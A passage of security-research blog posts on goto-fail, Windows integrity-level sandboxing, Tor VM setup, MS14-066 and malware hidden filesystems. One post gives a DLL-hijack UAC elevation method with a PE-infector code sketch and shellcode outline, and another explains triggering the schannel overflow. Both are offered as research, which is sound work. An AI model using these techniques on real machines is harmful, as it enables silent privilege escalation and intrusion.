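For anyone who hasn't seen it, the bug boils down to this pattern (a self-contained toy version, not Apple's actual code):

#include <stdio.h>

/* stand-in checks; in the real bug these were SSL hash/signature steps */
static int step_ok(void)     { return 0; }
static int final_check(void) { return -1; }   /* should fail verification */

int verify(void)
{
    int err;

    if ((err = step_ok()) != 0)
        goto fail;
        goto fail;            /* unconditional: skips the final check */
    if ((err = final_check()) != 0)
        goto fail;

fail:
    return err;               /* returns 0 even though final_check failed */
}

int main(void)
{
    printf("verify() = %d\n", verify());   /* prints 0, i.e. "verified" */
    return 0;
}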

Conclusion

Although the challenges are fun, they are really poorly made. Most of the code is taken from various websites and no context is given, leaving the player making massive assumptions about how the code works. I can't think of a real world scenario where you would have to find vulnerabilities in tiny snippets of code without knowing what they do or how the application uses them. Almost all of the vulnerabilities in this article could be non-existent if the application performs checks prior to calling the snippets, or if assumptions made about the imaginary functions they call are wrong.

Usermode Sandboxing

A lot of people (including myself, until recently) think that effective sandboxing requires a filter driver or kernel hooking, but this is no longer the case. A new security feature introduced in Windows Vista known as the Windows Integrity Mechanism can be used to create sandboxes that run entirely in usermode. Although the mechanism was not designed to be used this way, it makes for great driverless sandboxing.

The Windows Integrity Mechanism

Similar to User Account Control (UAC), the Windows Integrity Mechanism allows the system to restrict applications from accessing certain resources; however, it's more fine-grained than simply elevated/unelevated. There are 4 main levels provided, which can be set by a parent process prior to execution.

System Integrity (Mandatory Label\System Mandatory Level)
This is the highest integrity level and is used by processes and services running under the Local Service, Network Service, and System accounts. The purpose of this level is to provide a security layer between Administrator and System: even a process running as full Administrator cannot interact with System integrity level processes (the only exception to this rule is if the administrator account is granted the SE_DEBUG_NAME privilege, in which case a process can enable this privilege in its token to interact with processes across integrity and user boundaries).

High Integrity (Mandatory Label\High Mandatory Level)
The default integrity level assigned to processes running under the Administrator account, if User Account Control is enabled this level will only be given to elevated processes.

Medium Integrity (Mandatory Label\Medium Mandatory Level)
Given to processes running under a limited (non-Administrator) user account or processes on an Administrator account with UAC enabled. Processes assigned this integrity level can only modify HKEY_CURRENT_USER registry keys, files in non protected folders, and processes with the same or lower integrity.

Low Integrity (Mandatory Label\Low Mandatory Level)
The lowest integrity level is not assigned to processes by default; it is either assigned through inheritance (given to processes created by other low integrity processes) or set by the parent process. A process running with low integrity level can only create/modify keys under HKEY_CURRENT_USER\Software\AppDataLow and write files to %USERPROFILE%\AppData\LocalLow. It is practically impossible for a low integrity process to make any changes to the system; however, it can still read most data.

The windows integrity mechanism has a strict set of rules which makes it a nice system for process isolation (when used properly).

  • A process cannot change its own integrity level.
  • Once a process is running, the integrity level cannot be changed (even by a higher integrity process).
  • A process can create processes with the same (or lower) integrity level, but not higher.
  • Processes cannot modify/write processes/files with a higher integrity level.
There are a few (fairly low risk) exceptions to the above rules.
  • A high integrity process granted SE_DEBUG_NAME can modify processes of higher integrity level. 
  • A medium integrity process that is signed by Microsoft can elevate some COM objects from medium to high integrity (this is what gets leveraged by the auto-elevated process UAC exploit).
  • A process can request elevation from medium to high integrity, but only on execution (spawns UAC prompt). 
Communication between a low and higher integrity process (IPC) is possible when explicitly enabled by the higher integrity process. Any of the following methods can be used:
  • Shared Memory
  • Sockets
  • RPC
  • Windows Messages
  • Named Pipes

Usermode Sandboxing

In the past usermode sandboxes would inject a dll into sandboxed processes and hook various functions within ntdll. Although this was generally quite effective, applications could escape the sandbox by reading ntdll from the disk and using it to restore the hooks. Now usermode hooks are making a comeback in sandboxing, but without the previous drawbacks.




Processes can be spawned as low integrity to prevent them making changes to the system; however, in order for the sandboxed process to continue functioning normally, it may need to make some (limited) changes to the system, and this is where the hooks come in.

The sandbox creates a broker process which runs with a normal integrity level, this process then uses CreateProcessAsUser to spawn the target (sandboxed) process at low integrity. Before the target process begins execution, the sandbox dll is loaded and hooks ntdll so the hooks can be used to pass information about any calls (target function, parameter addresses, number of parameters) to the broker process via IPC. The broker process will read the parameters from the sandboxed process and filter/process calls on its behalf. Unlike with previous usermode sandboxes, removal of the hooks will result in the process not being able to modify system resources as it requires the broker process to do so on its behalf. 
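
The broker side of that is fairly compact. Below is a rough sketch of spawning the target at low integrity using the documented low-integrity SID (S-1-16-4096) with SetTokenInformation and CreateProcessAsUser; error handling and the hooking/IPC parts are omitted:

#include <windows.h>
#include <sddl.h>

#pragma comment(lib, "advapi32.lib")

/* spawn cmdline as a low integrity process (roughly the MSDN-documented pattern) */
BOOL spawn_low_integrity(char *cmdline)
{
    HANDLE hToken = NULL, hNewToken = NULL;
    PSID pLowSid = NULL;
    TOKEN_MANDATORY_LABEL tml = { 0 };
    STARTUPINFOA si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    BOOL ok = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(),
            TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT |
            TOKEN_ASSIGN_PRIMARY, &hToken))
        return FALSE;

    if (DuplicateTokenEx(hToken, 0, NULL, SecurityImpersonation,
                         TokenPrimary, &hNewToken) &&
        ConvertStringSidToSidA("S-1-16-4096", &pLowSid))   /* low IL SID */
    {
        tml.Label.Attributes = SE_GROUP_INTEGRITY;
        tml.Label.Sid = pLowSid;

        if (SetTokenInformation(hNewToken, TokenIntegrityLevel, &tml,
                sizeof(tml) + GetLengthSid(pLowSid)))
            ok = CreateProcessAsUserA(hNewToken, NULL, cmdline, NULL, NULL,
                                      FALSE, 0, NULL, NULL, &si, &pi);
    }

    if (ok) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }
    if (pLowSid) LocalFree(pLowSid);
    if (hNewToken) CloseHandle(hNewToken);
    if (hToken) CloseHandle(hToken);
    return ok;
}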

This type of sandboxing is already used by some applications (Such as Chrome, Internet Explorer, and Flash Player) to reduce the attack surface for exploits. Low integrity processes are used for processing and handling of untrusted data such as javascript or flash (As a result an exploit would first have to exploit the low integrity process and then exploit the sandbox process to gain full execution on the system).  

For malware sandboxing, things are a bit different: because low integrity processes can still manipulate other low integrity processes (most browsers run as low integrity), sandboxed malware would still be able to inject into a browser process and pass data back to a command and control server. Low integrity processes are also not very restricted in terms of reading data and could log documents and program data. To prevent malware from injecting into browsers or reading personal documents, it would be possible to run the sandboxed and broker processes under a different user account (CreateProcessAsUser), as low and medium integrity processes cannot read documents from other users' directories or interact with processes across user boundaries; however, they could still read from Program Files and System32.

Conclusion

Although the Windows Integrity Mechanism is by no means perfect for malware sandboxing, it is definitely a viable alternative to maintaining complex filter drivers and paying for code signing certificates. Windows 8 even introduces a new feature, AppContainer, which nicely complements the Windows Integrity Mechanism by allowing processes to be restricted to only reading and writing within their install folder. If Microsoft could just manage to stop making Fisher Price user interfaces for one operating system, we may see anti-malware sandboxes shifting to usermode as people move away from Windows 7.

New IRC Launch

For anyone still into IRC, MalwareTech has partnered with sigterm.no to launch a new IRC network. It's still fairly new so don't expect an instant response, but everyone is welcome (socializing or just asking for help).

Easy Method
Simply use our web IRC client: https://irc.malwaretech.com/

Proper Method
The server requires SSL so you'll need a client like mIRC (Windows), HexChat (Linux/Windows), or LimeChat (Mac). On Windows (if you haven't already), you may need to download and install OpenSSL.

Server:  irc.malwaretech.com
Port:    +6697 (include the + for SSL)
Channel: #MalwareTech

(Tor, I2P, and Proxies are all allowed).

Welcome to IRC



Creating a Secure Tor Environment

As we all know, there are ways your real IP can be leaked when using Tor (JavaScript, Flash, malware, and software errors). In this tutorial I'm going to show how to create a fairly secure Tor environment using VMware, which will prevent any IP leaks. The environment can be used for general browsing and malware research.

The first thing you're going to need to do is install VMware workstation (VMware player may also work), then install your favorite windows OS.

As you can see, I'm using Windows 8 because it's a great OS with a totally decent user interface which wasn't designed by Fisher Price.
The following instructions are to be carried out on the host (the computer running VMware)
Next you're going to need to enter the Virtual Machine settings and set the Network Adapter to Bridged, this will allow your VM to act as if it's a part of the network you're connected to. I should warn you that this may not be ideal for malware research as malware could probe, and possibly exploit, devices on your network. I will do a second (more complicated) tutorial that shows how to isolate the VM from your network, whilst still allowing it to connect to the internet via Tor.



If you have multiple network interfaces on your host machine, you will need to go into the VMware "Edit" menu and click "Virtual Network Preferences", from there you can set the bridge to connect to the adapter you use for internet access.



Next you need the network (local) IP address of the host network adapter you specified above. If you don't know how to find that, go to the network settings in Control Panel, right click the network adapter, click "Status", then click "Details" and it will be under "IPv4 Address".




You should download and install the "Vidalia Relay Bundle" as opposed to the tor browser. You can disable the relay feature by specifying "Client only".



You will also need to edit the torrc file and set it to listen on the host's network IP (and a port of your choice).
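
The relevant torrc line looks something like this (adjust the address and port to match your own host adapter; on older Tor/Vidalia versions the address may need to go in SocksListenAddress instead):

SocksPort 192.168.1.66:9050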



The following instructions are to be carried out inside the Virtual Machine
Now you need to set up the VM network adapter. All you need to do is go into the adapter settings, select "Internet Protocol Version 4 (TCP/IPv4)" and set "IP Address" to an IP within the network range of your host's adapter (I chose 192.168.1.99 as my host adapter is 192.168.1.66).



If you set up everything correctly thus far, you should get a response when pinging your host's network IP.



Now the VM is connected to your network but will not be able to access the internet, this is a good thing because it means once we finish the setup, internet access from within the VM will only be possible with tor.

I've decided to use proxifier, but the next few steps should work with any proxification software. First we will need to white-list the host's network IP Address so we don't get an infinite loop.



Once that's done, it's time to add our proxy server. The proxy server will be the host's IP and the port you configured Tor to listen on.



Now set the new proxy as the default rule (you can choose to skip this step and make specific rules if you wish).



Finally you need to set the name resolution mode to always resolve via proxy or the system will not be able to look up any domains.



If everything worked, you should be able to open a browser and check that you're connected via Tor. If the proxy client is closed, your VM internet will simply stop working instead of revealing your real IP.

Enjoy spending the rest of your life typing captchas.




Passive UAC Elevation

I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

LoadLibrary

This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file, the system will first check the KnownDlls registry key for the path; if it's not found there, the system will then look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64.

If you were to write a dll to the same path as an application and give it the same name as a commonly loaded system dll, it would likely be loaded by the application instead of the real thing; However, the dll must meet the following criteria.
  • The application must load the dll by its name and not the full path (this is common).
  • The dll must not exist in HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs.
  • The dll must match the process architecture (64-bit processes will quietly skip 32-bit dlls and vice versa).
  • The dll should exist in system32 or syswow64, special paths don't appear to work. 

ZeroAccess abused this method to "social engineer" the user into elevating the file. This was done by downloading the Adobe Flash installer from the official site, writing the bot's dll to the same path as the installer, then running it. When the installer was executed, the UAC popup would state that the application was from a verified publisher "Adobe Systems Incorporated" and the user would probably allow it to elevate (resulting in the elevated installer loading the bot's malicious dll). 

Is it a real flash update? Is it just ZeroAccess? Nobody knows.

A Less Invasive Method

What if there was a folder where 90% of the applications that require UAC elevation reside and what if it was writable from a non-elevated process? Well it turns out that folder exists: say hello to %userprofile%\Downloads\. You can probably see where I'm going with this. 

Although I wasn't expecting to find a dll that is loaded by most applications and meets all the criteria for a hijackable dll, after about 5 minutes of searching I found the motherlode: dwmapi.dll. Not only does this dll meet all the criteria, but it appears to be loaded by all setup files... So let's make a hello world dll, name it dwmapi.dll, drop it into the downloads folder, and run a setup file.
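
A bare-bones stand-in dll is enough for the test (build it to match the architecture of the target setup and name the output dwmapi.dll):

#include <windows.h>

/* minimal "hello world" dll: pops a message box when loaded */
BOOL WINAPI DllMain(HINSTANCE hinst, DWORD reason, LPVOID reserved)
{
    if (reason == DLL_PROCESS_ATTACH)
        MessageBoxA(NULL, "Loaded from the downloads folder", "dwmapi.dll", MB_OK);
    return TRUE;
}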



Success! The only problem here is that as soon as we start the setup it'll crash because we've replaced an important dll, however this is a fairly easy fix: dll infection. 

Writing a DLL Infector

My first idea was to simply add a new section header, change the NumberOfSections field in the PE header, then just append my section on to the end of the PE file. As it happens, directly after the last section header is the bound imports directory, which would be overwritten by our new section header. So after about 2 hours of writing an application to rebuild the entire PE from scratch, someone reminded me that the bound imports directory is just there to speed up the loading of imports and can simply be overwritten then disabled in the PE header. 

Following 15 minutes of holding CTRL + Z, I'm back to where I started and feeling a bit silly. An additional 2 lines of code has my infector working perfectly and we're ready to move on to the next step. The current infector simply disables and overwrites the bound imports directory with the new section header, appends the new section to the end of the PE file, adjusts the SizeOfImage to accommodate the new section, then changes the AddressOfEntryPoint to point to our new section.
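
For anyone curious what those steps look like in code, here's a heavily condensed sketch of the header changes (32-bit PE only; file alignment handling and error checks are mostly omitted, so treat it as illustration rather than a working infector):

#include <windows.h>
#include <string.h>

/* file: raw PE file buffer, file_size: its size, code_size: size of the new section */
DWORD add_section(BYTE *file, DWORD file_size, DWORD code_size)
{
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)file;
    IMAGE_NT_HEADERS32 *nt = (IMAGE_NT_HEADERS32 *)(file + dos->e_lfanew);
    IMAGE_SECTION_HEADER *sec = (IMAGE_SECTION_HEADER *)
        ((BYTE *)&nt->OptionalHeader + nt->FileHeader.SizeOfOptionalHeader);
    IMAGE_SECTION_HEADER *last = &sec[nt->FileHeader.NumberOfSections - 1];
    IMAGE_SECTION_HEADER *new_sec = last + 1;   /* sits where the bound imports were */
    DWORD align = nt->OptionalHeader.SectionAlignment;
    DWORD virt_size = (code_size + align - 1) & ~(align - 1);

    /* disable the bound import directory we're about to clobber */
    nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
    nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;

    memset(new_sec, 0, sizeof(*new_sec));
    memcpy(new_sec->Name, ".inf", 4);
    new_sec->VirtualAddress   = last->VirtualAddress +
        ((last->Misc.VirtualSize + align - 1) & ~(align - 1));
    new_sec->Misc.VirtualSize = code_size;
    new_sec->PointerToRawData = file_size;     /* section data appended at end of file */
    new_sec->SizeOfRawData    = code_size;     /* should really be rounded to FileAlignment */
    new_sec->Characteristics  = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE |
                                IMAGE_SCN_MEM_READ;

    nt->FileHeader.NumberOfSections++;
    nt->OptionalHeader.SizeOfImage = new_sec->VirtualAddress + virt_size;
    nt->OptionalHeader.AddressOfEntryPoint = new_sec->VirtualAddress;

    /* the caller then writes the shellcode at offset file_size and saves the file */
    return new_sec->VirtualAddress;
}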

All we need now is some code for the section.

The Shellcode

The obvious choice was to make the new section execute shellcode so we don't have to worry about relocations or imports. The actual code is pretty simple and written using some handy FASM macros; I'll quickly run over how it works.
  • Checks the stack to make sure that dwmapi.dll was called with DLL_PROCESS_ATTACH
  • Navigates the PEB Ldr structure to get the base address of Kernel32 and Ntdll.
  • Uses a simple GetProcAddress implementation to import the following functions: NtOpenProcessToken, NtQueryInformationToken, NtClose, ExpandEnvironmentStringsA, CreateProcessA.
  • Opens the current process token and queries it to confirm the application we are running from is UAC elevated.
  • Gets the path of cmd.exe then executes it (UAC elevated of course).
  • Passes execution back to the real dwmapi.dll entry point so execution can continue.

Putting It All Together

The final product infects dwmapi.dll with our shellcode and places it in the downloads folder; once the user downloads and runs a setup that requires UAC elevation, our elevated command prompt will be spawned (because of WOW64 file system redirection and the fact that most setups run under WOW64, we can use the same code on 32-bit and 64-bit Windows).

I've uploaded the full infector and shellcode source to my github: https://github.com/MalwareTech/UACElevator





How MS14-066 (Winshock) is More Serious Than First Thought

If you've been in a coma for the past week, MS14-066 is a TLS heap overflow vulnerability in Microsoft's schannel.dll, which can result in denial of service and even remote code execution on Windows systems (the bug is exploitable during the TLS handshake stage, prior to any authentication). According to BeyondTrust the problem exists in a function (schannel!DecodeSigAndReverse) which is used by the function responsible for verifying ECDSA (ECC) client certificates. The function passes the ECC signature to CryptDecodeObject and uses the returned length parameter to allocate some heap space, but then uses a separate value derived from the decoded object to copy to that memory (modifying the signature in a certain way will result in the copied memory exceeding the size of the buffer, causing a heap overflow).




The problem with MS14-066 is that in order to exploit the vulnerability, you'd need a service which uses schannel and accepts client certificates (this rules out Remote Desktop). As BeyondTrust showed us, IIS can be configured to require or allow client certificates, and thus becomes exploitable. Obviously SSL client authentication is only used in special cases and IIS will ignore client certificates by default, so the bug should have very little impact.




If you read the TLS handshake specification, a client certificate can only be sent if the server first sends a client certificate request (sending a client certificate without a prior request will result in the server telling you to go home and sober up, then forcibly closing the connection). IIS will only send a certificate request if client certificates are enabled; Remote Desktop never will. As it happens there is a second "bug" in schannel which makes MS14-066 far more dangerous: Microsoft's schannel TLS implementation doesn't exactly follow the standards, and modifying the OpenSSL binaries to just stuff the client certificate down the server's throat will result in it being processed anyway (uh-oh).

To test my theory, the first thing I did was install Windows 7 32-bit in a virtual machine and set up IIS7 (making sure it is set to ignore client certificates), then I started a remote kernel debugging session and set a breakpoint on schannel!DecodeSigAndReverse (called by the function responsible for handling client certificates) in lsass.exe, which processes SSL/TLS on behalf of most Windows services (it's a system service, so any exploitation will always result in NT AUTHORITY\SYSTEM privileges).

I started a normal TLS session to IIS with OpenSSL's s_client to check the breakpoint was not hit (it wasn't); next I modified the OpenSSL SSLv3 source to send a client certificate even though the server doesn't ask for one.




Jackpot! It was even the same story with Remote Desktop (RDP), a protocol that doesn't even support client certificates: I was still able to trigger the breakpoint. I don't really understand much about ECDSA / ECC so I'm not sure exactly what to modify in the signature to trigger the heap overflow (I believe some people just modified random bytes until an overflow was triggered), but this is definitely exploitable against services that don't allow client certificates, meaning that any un-patched system running IIS or RDP is exploitable (not just Windows servers as previously thought).

MS14-066 In Depth Analysis

A few days ago I published an article detailing how a second bug, in the schannel TLS handshake handling, could allow an attacker to trigger the DecodeSigAndReverse heap overflow in an application that doesn't support client certificates. I had stated I was not familiar with ECC signatures and was unsure of how to trigger the exploit; however, a few hours of research fixed that.

BeyondTrust's post implies they triggered the overflow by randomly modifying the ECC signature, though I believe this is unlikely and was just a safer alternative to disclosing exactly how to trigger the exploit. It was possible for me to achieve remote code execution with either ASLR or DEP disabled, but on a system with both enabled it would prove quite a challenge, thus I'm not too worried about detailing exactly how to trigger the overflow.

DecodeSigAndReverse

We already know the function in which the overflow occurs, so I decided to work backwards from there. This function is responsible for decoding the ASN.1 (DER) encoded ECC signature and returning it to be verified.



The first thing that happens here is the ECC signature is passed to CryptDecodeObject in order to calculate the total size of the decoded signature, which is used to allocate some memory using SPExternalAlloc (a LocalAlloc wrapper). CryptDecodeObject will always handle the signature correctly, with the returned size being sufficient.




CryptDecodeObject is now called again, but this time it is passed a pointer to the allocated memory in which to copy the decoded signature. The "cmp ebx, 2Fh" checks the signature type (X509_ECC_SIGNATURE) and will direct the code to the left.

The decoded signature is pointed to by an ECC_SIGNATURE header, which is 12 bytes in size and looks something like this.




What R and S are doesn't really matter here, all we need to know is they are extremely large integers. Our ECC structure now contains the size of each integer and a pointer to where it's stored.

The 2 memcpy operations should be pretty obvious now: the first one copies rSize bytes from R to some allocated memory, then the second copies sSize bytes of S to the same memory directly after R. If there's going to be an overflow, it's going to be in the second memcpy. What we don't yet know is the size of the destination memory or how it's allocated.




All I had to do to find where the memory gets allocated was look at the call graph, find the function responsible for calling DecodeSigAndReverse, then scout it for the "Dst" parameter.

This is where everything goes right (or wrong if you're Microsoft). _BCryptGetProperty is being passed "KeyLength" to... drum roll please... get the key length. Directly below, that length is divided by 8 (converted from bits to bytes) then doubled; this is due to the fact that the signature length is (should be) double the key length. Just before the call to DecodeSigAndReverse we can see that the destination buffer is also allocated on the heap.




Back at the two memcpys, now with knowledge of the destination buffer size, we can see exactly what triggers the heap overflow. If we use a key size of 256 bits (32 bytes), the function expects a 512-bit (64-byte) signature; anything larger will overflow the heap and cause a crash when the memory is freed.
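Putting the pieces together, the vulnerable logic can be sketched roughly as below. This is my reconstruction for illustration only: the function and variable names are invented, and the real schannel code uses its internal allocator (SPExternalAlloc) rather than HeapAlloc.

#include <windows.h>
#include <bcrypt.h>
#include <string.h>
#pragma comment(lib, "bcrypt.lib")

// Reconstruction of the vulnerable pattern described above, for illustration.
// hPublicKey is the peer's CNG key handle; pR/rSize and pS/sSize come straight
// from the attacker-controlled decoded signature.
void VulnerableCopy(BCRYPT_KEY_HANDLE hPublicKey,
                    const BYTE *pR, DWORD rSize,
                    const BYTE *pS, DWORD sSize)
{
    DWORD keyLenBits = 0;
    ULONG cbResult = 0;

    // "KeyLength" (BCRYPT_KEY_LENGTH) returns the key size in bits.
    BCryptGetProperty(hPublicKey, BCRYPT_KEY_LENGTH,
                      (PUCHAR)&keyLenBits, sizeof(keyLenBits), &cbResult, 0);

    // Expected signature size: key length in bytes, doubled (R and S).
    // For a 256-bit key this is 32 * 2 = 64 bytes.
    DWORD cbExpected = (keyLenBits / 8) * 2;
    BYTE *dst = (BYTE *)HeapAlloc(GetProcessHeap(), 0, cbExpected);

    // rSize and sSize are never checked against cbExpected, so an oversized
    // signature overflows the heap buffer in the second copy.
    memcpy(dst, pR, rSize);
    memcpy(dst + rSize, pS, sSize);
}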

There are very few constraints on the signature, due to the fact that the whole thing is just two massive integers. As long as we maintain a valid ASN.1 (DER) encoding and consistent length fields, we can write arbitrary data over the heap header, resulting in an access violation or even remote code execution when the system tries to free the memory.


Fraudsters & Malware Sellers Still Shifting to the Deep Web

On November 6th and 7th a global operation (dubbed Operation Onymous) was carried out against illegal (mostly black market) sites hosted on the Tor network, and as a result over 400 hidden services were seized. It's still debated exactly how authorities managed to seize so many hidden services, but judging by the lack of arrests it is unlikely to be a severe vulnerability in the Tor network. There's not a huge deal of information about the servers seized and where they were hosted; however, the Bulgarian National Security Agency announced that they had taken down 129 hidden services as part of Operation Onymous.

Coincidentally, if we go to the bitcoin wiki's list of ISPs that accept bitcoin, then filter out those located in the US or that don't allow Tor, this stands out.

vpsbg information bitcoin wiki

An Eastern European VPS provider that accepts bitcoin and allows anonymous registrations? If I were hosting a hidden service, this is probably one of the ISPs I'd choose. So maybe the authorities simply got in contact with local bitcoin- and Tor-friendly ISPs and asked them to cooperate? An offshore ISP that respects privacy surely wouldn't cooperate, would they?


Well, it turns out vpsbg is just another normal ISP abiding by the law, which makes it increasingly likely that almost all of those 129 hidden services were hosted there; all the authorities would have had to do is look for servers hosting Tor hidden services, then match the private keys against onion addresses known to host illicit sites.

With the possibility that the authorities used other means to find hidden services, coupled with a lack of vendor/admin arrests, it's probably safe to say that trust in Tor is still growing. Even with Operation Onymous' smoke-and-mirrors campaign designed to scare criminals away from Tor, it doesn't really come as a huge surprise that fraud and malware vendors are also finding safe haven on the deep web.

Evolution Market was arguably one of the three largest black markets prior to Operation Onymous, and is now the largest; it offers a platform for fraudsters and malware authors as well as the usual drug and arms dealers.

Despite the take downs, interest is still growing.


Hundreds of listings for stolen credit cards.

Listings for ATM skimmers and POS malware

Some scriptkiddie trying to sell the open source bootkit I posted on my github

There are a lot of reasons why cybercriminals would prefer Tor marketplaces over conventional ones. Generally, a lot of native English speakers live in countries where it's not in their best interest to be running high-profile malware/carding forums, and those clearnet marketplaces that do exist tend to run very strict screening policies to keep out law enforcement and security researchers; this is usually undesirable to vendors as it results in many legitimate members being banned on suspicion of being federal agents, or "Brian Krebs" in the case of darkode.
There's also the built-in anonymity and DDoS protection offered by Tor, which makes admins' and users' jobs much easier.




Virtual File Systems for Beginners

A Virtual File System (VFS), sometimes referred to as a Hidden File System, is a storage technique most commonly used by kernel mode malware, usually to store components outside of the existing filesystem. By using a virtual filesystem, malware developers can both bypass antivirus scanners and complicate work for forensic experts.

Filesystem Basics

If you're running Windows and not using hardware from the 90s or an OS installed on a flash drive, chances are you're using the New Technology File System (NTFS). In order to understand how a VFS benefits malware developers, first we need to dive into a bit of filesystem basics.

NTFS disk layout

In this example we have a disk containing only one partition (which runs Windows).

  • The Master Boot Record (MBR) gives the system information about the partition, such as its start sector and size.
  • The Volume Boot Record (VBR) is the primary boot code and will load the Windows bootloader and execute it; the VBR is the first sector within the NTFS partition. 
  • $BOOT is the boot area and contains the Windows boot loader.
  • $MFT is the Master File Table and tells the system where to find files within the filesystem.

Antivirus Scans
A full system scan will go through every file in the master file table and scan it; additionally, the antivirus can hook the filesystem driver and scan files on creation / write. If somebody didn't want a file to be scanned, not adding an entry to the MFT would be a good start. Unfortunately, if sectors within the partition are not referenced by the MFT, they are assumed unused and are likely to be overwritten as more files are written to the disk.

Malware Forensics
There are lots of techniques used when analyzing an infected system; however, looking for new/modified files is a common starting point for an analyst. To speed up file deletion, the system simply deletes the file's record in the MFT but leaves the actual file intact; this way the sectors can be overwritten by a new file and the system doesn't have to waste time zeroing out the old one. Because there's going to be random data left by deleted files all over the disk, it's very easy for an encrypted virtual filesystem to hide, further complicating analysis.

Obviously, if we can't write directly to free sectors within the partition for fear of them being overwritten, then we're going to have to write our VFS outside of the partition. What makes this possible is the fact that there is unused reserved space on both ends of the disk.

Disk Basics

For people who are interested in the (very technical) reasons behind the reserved space at the beginning and end of the disk, I suggest reading this section. If you're not interested or easily confused, skip to Virtual File Systems.

A hard disk platter

Space after the MBR
A disk platter is divided into tracks, which are divided into sectors; a single sector is 512 bytes in size and there is a fixed number of sectors per track. As technology advanced, the physical size of sectors got smaller so more sectors could fit onto a single track; however, the MBR field that describes the number of sectors per track is 6 bits in size, thus can only hold values 0 - 63, limiting the sectors per track to 63.

Eventually, someone figured out that the closer to the edge of the disk you get, the longer the tracks are and the more sectors they can hold. Nowadays the number of sectors per track varies depending on how far away from the spindle the track is, making the sectors-per-track field of the MBR fairly meaningless; for compatibility reasons, disks with more than 63 sectors per track just leave the value set at 63, and the same goes for SSDs and other media that don't have tracks.

For optimization reasons, when partitioning the disk the Windows partition manager will read the sectors-per-track value and align the partition on a track boundary (63 sectors per track means that the MBR will be sector 0 of track 0, while the start of the partition will be sector 0 of track 1, leaving 62 sectors of unused space between the MBR and the first partition).

The only problem with aligning the partition to 63 virtual (512-byte) sectors is that if the disk internally uses 4 KB sectors, there's going to be a big performance penalty: 63 * 512 is not a multiple of 4 KB, so the OS will constantly be writing across physical sector boundaries and wasting time with unnecessary read-modify-write cycles. In Windows Vista and onward Microsoft addressed this issue by starting the partition on the 2048th sector (leaving 1 MB of reserved space and aligning the partition to 4 KB). Nobody is exactly sure why they chose to leave so much space, but when it comes to malware, 1 MB is a lot of storage. 
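The alignment arithmetic is easy to sanity-check; here's a quick throwaway check of the two partition start offsets (values only, not tied to any particular disk):

#include <stdio.h>

// Check whether the old (sector 63) and new (sector 2048) partition start
// offsets are aligned to a 4 KB physical sector size.
int main(void)
{
    const unsigned long long logicalSector = 512;    // bytes
    const unsigned long long physicalSector = 4096;  // bytes

    unsigned long long oldStart = 63 * logicalSector;    // 32,256 bytes
    unsigned long long newStart = 2048 * logicalSector;  // 1,048,576 bytes (1 MB)

    printf("sector 63   -> offset %llu, 4K aligned: %s\n",
           oldStart, (oldStart % physicalSector == 0) ? "yes" : "no");   // no
    printf("sector 2048 -> offset %llu, 4K aligned: %s\n",
           newStart, (newStart % physicalSector == 0) ? "yes" : "no");   // yes
    return 0;
}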

Space at the end of the disk
Because the space at the start of the disk can be pretty small and isn't guaranteed on GPT systems, the space at the end may be a better bet. When allocating a partition, the Windows partition manager will end the partition before the end of the disk to leave space for dynamic disk information. As it happens, dynamic disks are incredibly rare on most computers because they're only used for software RAID and other black magic, which leaves between 1 MB and 100 MB of space at the end of the disk. 

Virtual File System

The location of the Virtual File System depends on the space needed and the system specifications, here's a quick overview of the reserved space.

Start Of Disk
  • On XP systems using the MBR partition format you are guaranteed 62 sectors (31.7 KB) of space between the MBR and the first partition.
  • On Vista+ systems using the MBR partition format you are guaranteed 2047 sectors (1 MB) of space between the MBR and the first partition. 
  • Because the GUID Partition Table (GPT) is of variable size and not restricted to 1 sector like the MBR, it is uncertain how much space will be available on systems using the GPT.
  • Other than by the GPT, this space is never used by Windows. 
End Of Disk
  • Between 1 MB and 100 MB, there doesn't appear to be any OS specifications for the exact size so the variation is likely to do with disk geometry (Ex: 1 disk track is reserved).
  • Some of the space can be used for dynamic disk information (most systems do not use dynamic disks unless using software RAID).

Contrary to popular belief, a VFS can be created and accessed by a user mode application, as long as it is running as administrator. To prevent malware from bypassing kernel code signing, raw disk access was "disabled" in Vista and onward; however, there is an exception for boot sectors and sectors residing outside of the filesystem (both reserved areas reside outside the filesystem), enabling user mode access to the VFS. Although direct user mode access is possible, most malware tends to manage the VFS from a kernel driver and expose an API to user mode components for reading/writing via the driver; this allows the VFS to be hidden from normal applications and other drivers.
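As a rough idea of what user mode access to the reserved area looks like, the sketch below opens the raw disk and reads one of the sectors between the MBR and the first partition. It's a minimal example that must be run as administrator; sector 32 is an arbitrary choice within the reserved area, and real malware would obviously encrypt whatever it stores there.

#include <windows.h>
#include <stdio.h>

// Read one 512-byte sector from the reserved area between the MBR and the
// first partition (requires administrator). Raw disk I/O must be done in
// sector-sized, sector-aligned chunks.
int main(void)
{
    HANDLE hDisk = CreateFileA("\\\\.\\PhysicalDrive0",
                               GENERIC_READ,
                               FILE_SHARE_READ | FILE_SHARE_WRITE,
                               NULL, OPEN_EXISTING, 0, NULL);
    if (hDisk == INVALID_HANDLE_VALUE)
    {
        printf("CreateFile failed: %lu\n", GetLastError());
        return 1;
    }

    LARGE_INTEGER offset;
    offset.QuadPart = 32LL * 512;              // sector 32, inside the reserved area
    SetFilePointerEx(hDisk, offset, NULL, FILE_BEGIN);

    BYTE sector[512];
    DWORD bytesRead = 0;
    if (ReadFile(hDisk, sector, sizeof(sector), &bytesRead, NULL))
        printf("read %lu bytes from sector 32\n", bytesRead);

    CloseHandle(hDisk);
    return 0;
}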

VFS driver and disk driver stack

